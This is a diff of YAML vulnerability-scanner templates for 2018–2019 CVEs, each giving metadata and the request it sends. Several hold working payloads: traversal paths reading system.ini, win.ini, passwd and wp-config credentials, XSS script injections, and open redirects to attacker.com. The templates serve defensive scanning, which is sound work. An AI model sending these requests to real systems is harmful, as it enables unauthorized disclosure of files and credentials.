cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -50,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ab225b4705ce3db314b245cfec6e012e94044d4209e5df98d39f0a05fa1bc53022100c21d77f5146d53ad87432f5f0963b8b27d95638346522784c2327e51af5fa17a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-14931.yaml b/poc/cve/cve-2018-14931.yaml new file mode 100644 index 0000000000..babdd309c5 --- /dev/null +++ b/poc/cve/cve-2018-14931.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-14931 + +info: + name: Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect + author: 0x_Akoko + severity: medium + description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI. + reference: + - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html + - https://www.cvedetails.com/cve/CVE-2018-14931 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-14931 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,polarisft,intellect + +requests: + - method: GET + + path: + - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/04/26 diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml index 2392e8714b..e2eabe600d 100644 --- a/poc/cve/cve-2018-15473.yaml +++ b/poc/cve/cve-2018-15473.yaml @@ -1,28 +1,28 @@ id: CVE-2018-15473 + info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 - - https://bugs.debian.org/906236 - - http://www.openwall.com/lists/oss-security/2018/08/15/5 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2018-15473 cwe-id: CWE-362 - tags: network,openssh,cve,cve2018 + + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' + extractors: - type: regex regex: diff --git a/poc/cve/cve-2018-15745.yaml b/poc/cve/cve-2018-15745.yaml new file mode 100644 index 0000000000..d271e88968 --- /dev/null +++ b/poc/cve/cve-2018-15745.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-15745 + +info: + name: Argus Surveillance DVR - Directory Traversal + author: gy741 + severity: high + description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. + reference: + - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt + - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html + - https://www.exploit-db.com/exploits/45296/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-15745 + cwe-id: CWE-22 + tags: cve,cve2018,argussurveillance,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "for 16-bit app support" + - "[drivers]" + condition: and diff --git a/poc/cve/cve-2018-16288.yaml b/poc/cve/cve-2018-16288.yaml index d31045c5bb..e90a28a2aa 100644 --- a/poc/cve/cve-2018-16288.yaml +++ b/poc/cve/cve-2018-16288.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/45440 - https://www.cvedetails.com/cve/CVE-2018-16288 - tags: cve,cve2018,lfi + - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html + - https://www.exploit-db.com/exploits/45440/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.60 + cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 + tags: cve,cve2018,lfi requests: - method: GET diff --git a/poc/cve/cve-2018-18775.yaml b/poc/cve/cve-2018-18775.yaml new file mode 100644 index 0000000000..c20b618642 --- /dev/null +++ b/poc/cve/cve-2018-18775.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-18775 + +info: + name: Cross Site Scripting in Microstrategy Web version 7 + author: 0x_Akoko + severity: medium + description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter + reference: + - https://www.exploit-db.com/exploits/45755 + - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html + - https://www.exploit-db.com/exploits/45755/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18775 + cwe-id: CWE-79 + tags: cve,cve2018,microstrategy,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '">' + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/poc/cve/cve-2018-18777.yaml b/poc/cve/cve-2018-18777.yaml index ca48a4b0e2..cf30bb7307 100644 --- a/poc/cve/cve-2018-18777.yaml +++ b/poc/cve/cve-2018-18777.yaml @@ -3,9 +3,21 @@ id: CVE-2018-18777 info: name: Path traversal vulnerability in Microstrategy Web version 7 author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/45755 - tags: microstrategy,lfi + severity: medium + description: | + Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) + allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. + (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. + reference: + - https://www.exploit-db.com/exploits/45755 + - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html + - https://www.exploit-db.com/exploits/45755/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2018-18777 + cwe-id: CWE-22 + tags: cve,cve2018,microstrategy,lfi,traversal requests: - method: GET @@ -17,7 +29,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/poc/cve/cve-2018-19877.yaml b/poc/cve/cve-2018-19877.yaml new file mode 100644 index 0000000000..860a40a6b3 --- /dev/null +++ b/poc/cve/cve-2018-19877.yaml @@ -0,0 +1,53 @@ +id: CVE-2018-19877 + +info: + name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability. + reference: + - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ + - https://www.exploit-db.com/exploits/45958/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19877 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19877 + cwe-id: CWE-79 + epss-score: 0.00241 + epss-percentile: 0.63554 + cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: adiscon + product: loganalyzer + tags: cve,cve2018,adiscon,xss,edb + +http: + - method: GET + path: + - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a0047304502210085b48bbdf595b702ebec999f9e07ec650e2ca0276e09d9ab926467143c087d0d022063857749f628ad5e3d598a8e17fa18c4708545c2196caebf9b7505e171159d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-19892.yaml b/poc/cve/cve-2018-19892.yaml index 81ee180a25..e957023784 100644 --- a/poc/cve/cve-2018-19892.yaml +++ b/poc/cve/cve-2018-19892.yaml @@ -5,20 +5,32 @@ info: author: arafatansari severity: medium description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters. + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45959 - https://github.com/domainmod/domainmod/issues/85 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19892 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-19892 cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.40415 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve2018,cve,domainmod,xss,authenticated,edb -requests: +http: - raw: - | POST / HTTP/1.1 @@ -26,21 +38,19 @@ requests: Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - - | POST /admin/dw/add-server.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= - - | GET /admin/dw/servers.php HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - redirects: true + host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word @@ -56,3 +66,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502201f24e9ecdde360ff34ab0c10a92f93fbbf91649ea9a2f0154e5cfb153518dd98022100fdae8217f56ff39de6d7e9c9e41db0001fb9c8ad1b336532ad1105c5fd39fa5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-20011.yaml b/poc/cve/cve-2018-20011.yaml index 03b42fdb8d..fe65c778d6 100644 --- a/poc/cve/cve-2018-20011.yaml +++ b/poc/cve/cve-2018-20011.yaml @@ -6,20 +6,31 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46374/ - https://github.com/domainmod/domainmod/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-20011 cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.50703 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve1028,domainmod,xss,authenticated + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve2018,cve,domainmod,xss,authenticated,edb -requests: +http: - raw: - | POST / HTTP/1.1 @@ -27,28 +38,23 @@ requests: Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - - | POST /assets/add/category.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= - - | GET /assets/categories.php HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - redirects: true + host-redirects: true max-redirects: 2 - req-condition: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' + - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and - -# Enhanced by mp on 2022/08/10 +# digest: 490a0046304402206c740f13dea0b88d62e8f6cac876937c9522029b8222a3b548752237227d881b022033a65cc2e73acb43e2e310d063cef73c545e294c9587f18f385a32e4af343a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-20470.yaml b/poc/cve/cve-2018-20470.yaml new file mode 100644 index 0000000000..5d89cd2d44 --- /dev/null +++ b/poc/cve/cve-2018-20470.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-20470 + +info: + name: Sahi pro 7.x/8.x - Directory Traversal + author: daffainfo + severity: high + description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. + reference: + - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ + - https://www.cvedetails.com/cve/CVE-2018-20470 + - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-20470 + cwe-id: CWE-22 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/poc/cve/cve-2018-20985.yaml b/poc/cve/cve-2018-20985.yaml new file mode 100644 index 0000000000..71ed01c5b8 --- /dev/null +++ b/poc/cve/cve-2018-20985.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-20985 + +info: + name: WordPress Payeezy Pay <=2.97 - Local File Inclusion + author: daffainfo + severity: critical + description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + reference: + - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ + - https://wordpress.org/plugins/wp-payeezy-pay/#developers + - https://www.cvedetails.com/cve/CVE-2018-20985/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-20985 + cwe-id: CWE-20 + tags: cve,cve2018,wordpress,lfi,plugin + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" + + body: "x_login=../../../wp-config" + + matchers-condition: and + matchers: + - type: word + words: + - "The base configuration for WordPress" + - "define( 'DB_NAME'," + - "define( 'DB_PASSWORD'," + condition: and + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/poc/cve/cve-2018-2893.yaml b/poc/cve/cve-2018-2893.yaml index b425128530..e7ba463a2a 100644 --- a/poc/cve/cve-2018-2893.yaml +++ b/poc/cve/cve-2018-2893.yaml @@ -10,9 +10,10 @@ info: - https://www.anquanke.com/post/id/152164 - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-2893 tags: cve,cve2018,weblogic,network,deserialization,rce,oracle @@ -40,5 +41,4 @@ network: words: - "StreamMessageImpl cannot be cast to weblogic" - # Enhanced by mp on 2022/04/14 diff --git a/poc/cve/cve-2018-3714.yaml b/poc/cve/cve-2018-3714.yaml index cfc52cbabe..50093afd70 100644 --- a/poc/cve/cve-2018-3714.yaml +++ b/poc/cve/cve-2018-3714.yaml @@ -1,8 +1,18 @@ id: CVE-2018-3714 + info: name: node-srv Path Traversal author: madrobot - severity: high + severity: medium + description: node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path. + reference: + - https://hackerone.com/reports/309124 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2018-3714 + cwe-id: CWE-22 + tags: cve,cve2018,nodejs,lfi requests: - method: GET @@ -15,5 +25,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/poc/cve/cve-2018-6200.yaml b/poc/cve/cve-2018-6200.yaml index 6f68588c00..87bd8ef42a 100644 --- a/poc/cve/cve-2018-6200.yaml +++ b/poc/cve/cve-2018-6200.yaml @@ -1,28 +1,37 @@ id: CVE-2018-6200 info: - name: vBulletin 3.x.x & 4.2.x - open redirect - author: 0x_Akoko + name: vBulletin 3.x.x & 4.2.x - Open Redirect + author: 0x_Akoko,daffainfo severity: medium - description: vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter. + description: | + vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter. reference: - https://cxsecurity.com/issue/WLB-2018010251 - https://www.cvedetails.com/cve/CVE-2018-6200 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-6200 cwe-id: CWE-601 + metadata: + verified: true tags: cve,cve2018,redirect,vbulletin requests: - method: GET path: - - '{{BaseURL}}//redirector.php?url=https://example.com' - - '{{BaseURL}}/redirector.php?do=nodelay&url=https://example.com' + - '{{BaseURL}}/redirector.php?url=https://attacker.com' + - '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com' + matchers-condition: and matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2018-6389.yaml b/poc/cve/cve-2018-6389.yaml new file mode 100644 index 0000000000..cb3a8f1486 --- /dev/null +++ b/poc/cve/cve-2018-6389.yaml @@ -0,0 +1,16 @@ +id: CVE-2018-6389 + +info: + name: Wordpress Load Script + author: nadino + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/load-scripts.php?load=" + matchers: + - type: dsl + dsl: + - 'contains(x_powered_by,"Engine")' + - 'contains(content_type,"javascript")' diff --git a/poc/cve/cve-2018-8006.yaml b/poc/cve/cve-2018-8006.yaml new file mode 100644 index 0000000000..c25171c9c6 --- /dev/null +++ b/poc/cve/cve-2018-8006.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-8006 + +info: + name: Apache ActiveMQ XSS + author: pdteam + severity: medium + description: An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter. + reference: + - http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt + - http://www.securityfocus.com/bid/105156 + - https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/fcbe6ad00f1de142148c20d813fae3765dc4274955e3e2f3ca19ff7b@%3Cdev.activemq.apache.org%3E + - https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/03f91b1fb85686a848cee6b90112cf6059bd1b21b23bacaa11a962e1@%3Cdev.activemq.apache.org%3E + - https://lists.apache.org/thread.html/3f1e41bc9153936e065ca3094bd89ff8167ad2d39ac0b410f24382d2@%3Cgitbox.activemq.apache.org%3E + - https://lists.apache.org/thread.html/c0ec53b72b3240b187afb1cf67e4309a9e5f607282010aa196734814@%3Cgitbox.activemq.apache.org%3E + - https://lists.apache.org/thread.html/rb698ed085f79e56146ca24ab359c9ef95846618675ea1ef402e04a6d@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-8006 + cwe-id: CWE-79 + tags: cve,cve2018,apache,activemq,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68' + matchers-condition: and + matchers: + - type: word + words: + - '">' + - type: word + words: + - "/html" + part: header diff --git a/poc/cve/cve-2018-9161.yaml b/poc/cve/cve-2018-9161.yaml index 5db121e528..f1f172c1cd 100644 --- a/poc/cve/cve-2018-9161.yaml +++ b/poc/cve/cve-2018-9161.yaml @@ -4,16 +4,17 @@ info: name: PrismaWEB - Credentials Disclosure author: gy741 severity: critical - description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 - tags: cve,cve2018,prismaweb,exposure + - https://www.exploit-db.com/exploits/44276/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-9161 cwe-id: CWE-798 + tags: cve,cve2018,prismaweb,exposure requests: - method: GET @@ -32,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/poc/cve/cve-2018-9205.yaml b/poc/cve/cve-2018-9205.yaml index 7b192e26e1..5f152b9806 100644 --- a/poc/cve/cve-2018-9205.yaml +++ b/poc/cve/cve-2018-9205.yaml @@ -16,8 +16,6 @@ info: cvss-score: 7.5 cve-id: CVE-2018-9205 cwe-id: CWE-22 - metadata: - shodan-query: http.component:"drupal" tags: cve,cve2018,lfi,drupal requests: diff --git a/poc/cve/cve-2019-10092.yaml b/poc/cve/cve-2019-10092.yaml index db7cdb6215..4c728aca64 100644 --- a/poc/cve/cve-2019-10092.yaml +++ b/poc/cve/cve-2019-10092.yaml @@ -2,8 +2,19 @@ id: CVE-2019-10092 info: name: Apache mod_proxy HTML Injection / Partial XSS - author: pd-team + author: pdteam severity: medium + description: In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed. + reference: + - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-10092-Limited%20Cross-Site%20Scripting%20in%20mod_proxy%20Error%20Page-Apache%20httpd + - https://httpd.apache.org/security/vulnerabilities_24.html + - https://lists.debian.org/debian-lts-announce/2019/09/msg00034.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-10092 + cwe-id: CWE-79 + tags: cve,cve2019,apache,htmli,injection requests: - method: GET @@ -12,4 +23,4 @@ requests: matchers: - type: word words: - - "" \ No newline at end of file + - "" diff --git a/poc/cve/cve-2019-1010290.yaml b/poc/cve/cve-2019-1010290.yaml index 9530bd36bb..24fe7c97df 100644 --- a/poc/cve/cve-2019-1010290.yaml +++ b/poc/cve/cve-2019-1010290.yaml @@ -1,38 +1,28 @@ id: CVE-2019-1010290 info: - name: Babel - Open Redirect + name: Babel - Open Redirection author: 0x_Akoko severity: medium - description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. - remediation: | - Upgrade to Babel version 7.4.0 or later to mitigate this vulnerability. + description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker reference: - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/ + - https://www.cvedetails.com/cve/CVE-2019-1010290 - http://dev.cmsmadesimple.org/project/files/729 - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010290 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-1010290 cwe-id: CWE-601 - epss-score: 0.00198 - epss-percentile: 0.57529 - cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* - metadata: - max-request: 1 - vendor: cmsmadesimple - product: bable\ tags: cve,cve2019,redirect,babel -http: +requests: - method: GET path: - - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh' + - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a004630440220387878ef6292c32281b69d76d22d1833cfcf37aefd7665461f4fa9aa4a8c908a02201e0cab4e9fe60f0a856a455a87653fa0c22a12e9f93f7a149301a4adce973ff5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2019-11013.yaml b/poc/cve/cve-2019-11013.yaml index 680aabcde6..1e4b2284c8 100644 --- a/poc/cve/cve-2019-11013.yaml +++ b/poc/cve/cve-2019-11013.yaml @@ -3,9 +3,19 @@ id: CVE-2019-11013 info: name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/47301 - tags: cves,lfi,nimble + severity: medium + description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside 